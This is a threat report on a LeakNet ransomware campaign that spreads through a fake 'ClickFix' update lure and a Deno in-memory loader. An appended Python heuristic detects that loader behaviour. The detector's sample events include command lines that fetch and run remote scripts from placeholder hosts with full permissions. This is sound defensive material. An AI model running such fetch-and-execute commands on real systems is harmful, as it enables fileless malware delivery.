A sophisticated new ransomware campaign attributed to the LeakNet group is leveraging a multi-stage infection chain that begins with compromised legitimate websites. Security researchers have identified a novel attack vector where victims are redirected to malicious sites hosting a fake software update utility called "ClickFix." This social engineering lure prompts users to download and execute a malicious package, which is the critical first step in the attack. The campaign demonstrates a significant evolution in initial access techniques, moving away from reliance on phishing emails to the exploitation of trusted web domains, thereby increasing the likelihood of user compliance and bypassing traditional email security filters.
Upon execution, the ClickFix package initiates a complex deployment sequence designed to evade detection. The core of this sequence is the use of Deno, a secure runtime for JavaScript and TypeScript typically used by developers, as an in-memory loader for the final ransomware payload. By utilizing Deno's legitimate functionality to fetch and execute remote scripts, the attackers can run malicious code directly in system memory without writing a persistent file to disk. This fileless execution technique presents a substantial challenge for conventional antivirus solutions that rely on file signature scanning, allowing the malware to operate stealthily within the victim's environment.
The final payload delivered by this in-memory loader is identified as LeakNet ransomware. This malware conducts typical ransomware operations, including file encryption and the exfiltration of sensitive data, aligning with the double-extortion tactic now commonplace among ransomware gangs. The attackers threaten to publish stolen data on leak sites unless a ransom is paid. The use of a legitimate tool like Deno as an attack component underscores a growing trend in cybercrime: the "living-off-the-land" (LotL) strategy, where attackers abuse trusted, pre-installed software or common development tools to blend malicious activity with normal system operations, further complicating detection and forensic analysis.
Organizations are urged to enhance their defensive postures against such advanced threats. Key recommendations include implementing robust web filtering to block access to known malicious and newly compromised domains, educating users on the dangers of downloading unsolicited software—even from seemingly legitimate websites—and deploying endpoint detection and response (EDR) solutions capable of monitoring for suspicious in-memory activities and process behaviors. This campaign serves as a stark reminder that the threat landscape is continuously evolving, with adversaries innovating their methods to exploit both technological gaps and human trust.
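The EDR recommendation above and the Deno loader described earlier can be turned into a concrete detection. The following is an added example, not code from the article or from any vendor it cites: a small Python heuristic that reads process-creation events and flags Deno invocations that fetch a script from an unfamiliar host or execute inline code with broad permissions, then records the corroborating context (permission flags, non-developer parent process). The `key=value` log format, the allowlists of module hosts and developer parent processes, and the sample events are all constructed assumptions to tune for your own environment; the Deno subcommands and flags referenced (`run`, `eval`, `-A`, `--allow-net`, `--allow-run`) are real Deno options.

```python
"""Heuristic detection of Deno used as an in-memory loader.

Added example (not from the original article). Log format, allowlists and
sample events are constructed for illustration.
"""
import re
from urllib.parse import urlparse

# Real Deno permission flags; a loader needs at least network access to
# fetch its payload, so broad grants alongside a remote script are notable.
BROAD_PERMISSIONS = {"-A", "--allow-all", "--allow-net", "--allow-run",
                     "--allow-write", "--allow-read"}

# Assumption: parents from which a developer would normally launch Deno.
DEVELOPER_PARENTS = {"code.exe", "windowsterminal.exe", "bash", "zsh"}

# Assumption: hosts developers commonly import Deno modules from.
KNOWN_MODULE_HOSTS = {"deno.land", "jsr.io", "esm.sh"}

FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')
URL_RE = re.compile(r"https?://[^\s'\"()]+")


def parse_event(line):
    """Parse a constructed 'key=value' process-creation line into a dict."""
    fields = {}
    for m in FIELD_RE.finditer(line):
        key, raw, quoted = m.group(1), m.group(2), m.group(3)
        fields[key] = quoted if quoted is not None else raw
    return fields


def assess_deno_command(cmdline, parent_image):
    """Return the reasons a Deno command line looks like a remote loader.

    An empty list means the event matches normal developer use (local
    script, or a module pulled from a known host).
    """
    tokens = cmdline.split()
    if not tokens or "deno" not in tokens[0].lower():
        return []
    subcmd = tokens[1] if len(tokens) > 1 else ""
    reasons = []
    if subcmd == "eval":
        reasons.append("inline code via 'deno eval'")
    for url in URL_RE.findall(cmdline):
        host = (urlparse(url).hostname or "").lower()
        if host not in KNOWN_MODULE_HOSTS:
            reasons.append(f"runs remote script from unknown host {host}")
    if not reasons:
        return []
    # Primary indicator present: add corroborating context.
    granted = BROAD_PERMISSIONS.intersection(tokens)
    if granted:
        reasons.append("broad permissions " + " ".join(sorted(granted)))
    parent = re.split(r"[\\/]", parent_image)[-1].lower()
    if parent and parent not in DEVELOPER_PARENTS:
        reasons.append(f"launched from non-developer parent {parent}")
    return reasons


def scan_log(lines):
    """Return [(EventId, reasons)] for events that trip the heuristics."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        reasons = assess_deno_command(ev.get("CommandLine", ""),
                                      ev.get("ParentImage", ""))
        if reasons:
            hits.append((ev.get("EventId"), reasons))
    return hits


# Constructed sample events: 1 and 4 mimic a loader launched from a user
# shell; 2 and 3 are ordinary developer activity and must not fire.
SAMPLE_LOG = [
    'EventId=1 ParentImage="C:\\Windows\\explorer.exe" '
    'CommandLine="C:\\Users\\u\\.deno\\bin\\deno.exe run -A https://updates.example.invalid/fix.ts"',
    'EventId=2 ParentImage="C:\\Program Files\\Microsoft VS Code\\Code.exe" '
    'CommandLine="deno.exe run --allow-net https://deno.land/std/http/file_server.ts"',
    'EventId=3 ParentImage="C:\\Windows\\System32\\cmd.exe" '
    'CommandLine="deno.exe run main.ts"',
    'EventId=4 ParentImage="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="deno.exe eval -A import(\'https://cdn.example.invalid/p.js\')"',
]

if __name__ == "__main__":
    for event_id, reasons in scan_log(SAMPLE_LOG):
        print(event_id, "; ".join(reasons))
```

The primary indicators (a remote script from an unlisted host, or `deno eval`) gate the alert; permission flags and the parent process are only attached as context once a primary indicator fires, which keeps routine `deno run main.ts` from a terminal out of the alert queue. In a real deployment the allowlists would be populated from observed developer activity, and the parent-process check is what ties the alert back to the web-lure delivery described above.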